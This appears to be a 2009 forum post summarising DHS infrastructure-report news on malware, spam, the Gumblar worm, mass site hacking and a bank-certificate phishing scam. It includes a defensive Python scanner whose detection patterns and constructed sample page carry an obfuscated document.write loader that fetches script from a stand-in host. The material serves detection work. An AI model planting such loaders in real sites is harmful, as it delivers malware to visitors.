
Weekly Summary of the "DHS Daily Open Source Infrastructure Report"

Old 06-07-2009

The DHS Daily Open Source Infrastructure Report covers the publicly reported material for the preceding day(s) not previously covered. This weekly summary provides a selection of those items of greatest significance to the InfoSec professional.



Week Ending: Friday, June 5, 2009

Daily Open Source Infrastructure Report for 1 June 2009

Perhaps You Should Consider Blocking Some Search Terms!

25. May 28, SC Magazine - (International) McAfee documents riskiest search terms. A McAfee study into 2,600 of the most popular keyword searches on the web has concluded that hunts for “screensavers” present the most risk. The report released the week of May 25 shows that users who search for “screensavers” have a 59.1 percent chance that they will be infected by malware on a given page of results. By category, the most dangerous searches involved keywords containing the word “lyrics” (26.3 percent risk) and “free” (21.3 percent). The safest category searches, meanwhile, related to “health” (four percent) and the “economic crisis” (3.5 percent). The report also warned of the risk generated by searching for information on “work from home.” Variations of this search term - considered more popular than ever, given the state of the economy - ranged from a 6.3 percent-risk to a 40 percent-risk of infection. Source: http://www.scmagazineus.com/McAfee-d...rticle/137632/

Daily Open Source Infrastructure Report for 2 June 2009

Are You Prepared for the Latest Corporate Spamming Techniques?

26. June 1, Computerworld - (International) Spammers find new ways to flood corporate networks. Unsolicited e-mail accounted for 90.4 percent of all messages received on corporate networks during April, an increase of 5.1 percent from a month earlier, according to a report released May 26 by Symantec Corp.'s MessageLabs Intelligence unit. The monthly MessageLabs report on threat trends also found that nearly 58 percent of all spam can be traced to botnets. A researcher at Cloudmark Inc., a provider of antispam tools, noted that in addition to using botnets, spammers in recent months have been experimenting with a new way to sneak unwanted email past corporate filters. Often, he said, a spammer will rent legitimate network services, often in an Eastern European country, and then blast a large amount of spam at the network of a specific ISP. The idea is to push as many messages as possible onto the network before any kind of filtering software detects the incident. The researcher estimates that hundreds of thousands of such messages are sent each day without detection. Source: http://www.computerworld.com/action/...&intsrc=kc_top

Daily Open Source Infrastructure Report for 3 June 2009

Is there a “Gumblar” in your future?

32. June 2, CNET News - (International) Thought the Conficker virus was bad? Gumblar is even worse. ScanSafe, a computer security firm, has been tracking the progress of the worm since its arrival on the scene in March, according to CNET. Originally, the attack spread through infectious code that was planted in hacked Web sites and then downloaded malware from the gumblar.cn domain on to victims' computers. But that was just the opening salvo. As Web site operators cleaned their pages of the code, Gumblar replaced the original material with dynamically generated Javascript (Web site code that is created on the spot instead of being completely determined beforehand - a key element of Web apps like Gmail) that is much harder for security software to detect and remove. The evolved version also went about adding new domains to the list of sources for downloading its malware payload, including liteautotop.cn and autobestwestern.cn, and began exploiting security holes in Flash and Adobe Reader. The worm also searches out credentials for FTP servers (a method for uploading files to a Web site) on a victim's computer, using them to infect additional Web sites. It is not clear how many sites Gumblar has infected, but security firms seem to agree that it accounts for about 40 percent of all new malware infections right now. According to ScanSafe in just the first two weeks of May over 3,000 Web sites were compromised and spreading the worm. Most sites have been quick to clean up the infections as best they can, but, even if all the infected pages were removed, Gumblar would still have an army of infected PCs to inflict further damage. Source: http://www.switched.com/2009/06/02/t...-meet-gumblar/

Daily Open Source Infrastructure Report for 4 June 2009

Has one of the sites for which you are responsible been compromised?

35. June 2, IDG News Service - (International) Thousands of Web sites stung by mass hacking attack. As many as 40,000 Web sites have been hacked to redirect unwitting victims to another Web site that tries to infect PCs with malicious software, according to security vendor Websense. The affected sites have been hacked to host JavaScript code that directs people to a fake Google Analytics Web site, which provides data for Web site owners on a site's usage, then to another bad site, said the threat research manager for Websense. Those Web sites have likely been hacked via a SQL injection attack, in which improperly configured Web applications accept malicious data and get hacked, the researcher said. Another possibility is that the FTP credentials for the sites have somehow been obtained by hackers, giving them access to the inner workings of the site. It appears the hackers are using automated tools to seek out vulnerable Web sites, the researcher said. The latest campaign underscores the success hackers have at hosting dangerous code on poorly secured Web sites. Once a user has been directed to the bogus Google analytics site, it redirects again to another malicious domain. That site tests to see if the PC has software vulnerabilities in either Microsoft Corp.'s Internet Explorer browser or Firefox that can be exploited in order to deliver malware, the researcher said. If it does not find a problem there, it will launch a fake warning saying the computer is infected with malware and then try to get the user to willingly download a program that purports to be security software but is actually a Trojan downloader, he said. The fake security programs are often called “scareware” and do not work as advertised. As of May 29, only four of 39 security software programs could detect that Trojan, although that is now likely changed as vendors such as Websense swap malware samples with other companies in order to improve overall Internet security.
Source: http://www.computerworld.com/action/article.do?command=viewArticleBasic&taxonomyName=security&articleId=9133820&taxonomyId=17&intsrc=kc_top See also: http://news.cnet.com/8301-1009_3-10255226-83.html
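Both the Gumblar item above and this one describe the same footprint on a compromised site: a script tag pointing at a host the site never used before (here, a lookalike "Google Analytics" host) or an obfuscated inline loader that writes the real payload reference at run time. The following Python script is an added defensive example, not code from the report or from any vendor it cites. It scans saved copies of your own pages against an allowlist of script hosts and a few obfuscation heuristics; the allowlist, the heuristic patterns and both sample pages (including the constructed lookalike host google-analytics.example and the constructed bad.example) are assumptions made for the example.

```python
"""Flag pages that carry script injections of the kind described above:
a <script src> pointing outside the site's allowlist, or an inline script
using common obfuscation tricks. Heuristic only: it raises pages for human
review, it does not clean them."""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Assumption: the site operator maintains the set of hosts this site
# legitimately loads scripts from. Anything else is reported.
ALLOWED_SCRIPT_HOSTS = {"www.example.org", "www.google-analytics.com"}

# Assumed indicators of injected loader code (heuristics, not signatures).
OBFUSCATION_PATTERNS = [
    re.compile(r"String\.fromCharCode", re.I),
    re.compile(r"\bunescape\s*\(", re.I),
    re.compile(r"(?:%[0-9a-f]{2}){8,}", re.I),    # long percent-encoded run
    re.compile(r"(?:\\x[0-9a-f]{2}){8,}", re.I),  # long hex-escaped run
    re.compile(r"document\.write\s*\(\s*['\"]\s*<\s*(?:script|iframe)", re.I),
]


class ScriptCollector(HTMLParser):
    """Collect external script URLs and inline script bodies from one page."""

    def __init__(self):
        super().__init__()
        self.external = []      # values of <script src=...>
        self.inline = []        # bodies of <script>...</script>
        self._in_script = False
        self._buf = []

    def handle_starttag(self, tag, attrs):
        if tag != "script":
            return
        src = dict(attrs).get("src")
        if src:
            self.external.append(src)
        else:
            self._in_script, self._buf = True, []

    def handle_data(self, data):
        # HTMLParser hands script bodies over as raw data (CDATA mode).
        if self._in_script:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._in_script:
            self.inline.append("".join(self._buf))
            self._in_script = False


def scan_html(html, allowed_hosts=ALLOWED_SCRIPT_HOSTS):
    """Return a list of (finding_kind, detail) tuples; empty means nothing flagged."""
    parser = ScriptCollector()
    parser.feed(html)
    parser.close()
    findings = []
    for src in parser.external:
        host = urlparse(src).hostname        # None for relative URLs (same host)
        if host and host.lower() not in allowed_hosts:
            findings.append(("external-script", host.lower()))
    for body in parser.inline:
        hits = [p.pattern for p in OBFUSCATION_PATTERNS if p.search(body)]
        if hits:
            findings.append(("obfuscated-inline", hits[0]))
    return findings


# Constructed sample pages (not real sites). The "injected" page adds a script
# from a lookalike analytics host plus an unescape()-wrapped loader, mirroring
# the redirect chain described in the report.
CLEAN_PAGE = """<html><head>
<script src="http://www.example.org/js/site.js"></script>
<script src="http://www.google-analytics.com/ga.js"></script>
<script>var gaJsHost = "http://www."; function init() {}</script>
</head><body>ok</body></html>"""

INJECTED_PAGE = CLEAN_PAGE.replace("</body>", """
<script src="http://google-analytics.example/urchin.js"></script>
<script>document.write(unescape('%3Cscript%20src%3D%22http%3A%2F%2Fbad.example%2Fx.js%22%3E%3C%2Fscript%3E'));</script>
</body>""")

if __name__ == "__main__":
    for name, page in (("clean", CLEAN_PAGE), ("injected", INJECTED_PAGE)):
        print(name, scan_html(page) or "no findings")
```

Point it at files pulled from the web root (or at a crawl of the live site) and diff the findings against a known-good baseline; a hit is a prompt to compare the page with the copy in version control, not a verdict. Relative script paths are deliberately not reported, since they resolve to the site's own host, so a loader dropped as a local file still needs the usual file-integrity check on the web root.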

Daily Open Source Infrastructure Report for 5 June 2009

Will U.S. Government investment in Cyber Security help solve problems?

37. June 3, Congress Daily - (National) Obama Administration begins work on cybersecurity R&D. Maximizing government investment in federal cybersecurity research and development is a major component of the U.S. President's plan to bolster defenses against high-tech attacks. If the White House's new cyber strategy and key agencies' fiscal 2010 budget requests are any indication, they are off to a solid start. In the near term, the White House's unnamed cyber czar will be charged with developing a framework for R&D strategies that focus on “game-changing technologies” and provide the research community access to event data to help develop tools and testing theories, according to the May 29 report, which stemmed from a 60-day review. That czar will eventually develop threat scenarios and metrics for risk management decisions, recovery planning and R&D prioritization. “Research on new approaches to achieving security and resiliency in information and communications infrastructures is insufficient,” the report stated. “The government needs to increase investment in research that will help address cybersecurity vulnerabilities while also meeting our economic needs and national security requirements.” The President proposed a $37.2 million cyber R&D budget for DHS in fiscal 2010 to support operations in its national cybersecurity division as well as projects within the CNCI. DHS is using much of its fiscal 2009 allotment to deploy Einstein, a system to analyze civilian agencies' systems for cyber threats and intrusions. Source: http://www.nextgov.com/nextgov/ng_20090603_2540.php

Perhaps something like this?

11. June 2, SC Magazine - (National) Bank of America certificate scam propagating Waledac, Virut. A new spam campaign disguised as a Bank of America email telling users they need to update their digital certificate is attempting to lure users into installing the Waledac worm. The messages, which first started being detected recently, seemingly come from Bank of America, and tell users, “The digital certificate for your Bank of America direct online account has expired. You need to update the certificate using Bank of America direct digital certificate updating procedure.” Recipients are then instructed to click on a link and follow the given instructions, the lead threat analyst at web and email security firm Marshal8e6 told SCMagazineUS.com in an email on June 1. The spam originates from the Pushdo botnet, which has been active in similar malicious phishing attacks, the analyst said. After following the link, the user is encouraged to fill in a web form, and to download a new “digital certificate” to continue, the analyst said. The “certificate” however, is an executable file which seeks to download malware to the victim's PC. The SANS Internet Storm center said in a post on June 1 that a quick analysis of this malware showed “probable signs” of Waledac, the notorious worm capable of harvesting and forwarding password information and receiving commands from a remote server. A threat researcher for Panda Security confirmed to SCMagazineUS.com on June 2 that the threat is being detected as Waledac. Source: http://www.scmagazineus.com/Bank-of-...rticle/137848/

Note: The DHS only maintains the last ten days of their reports online. To obtain copies of earlier reports or complete summaries, go to:

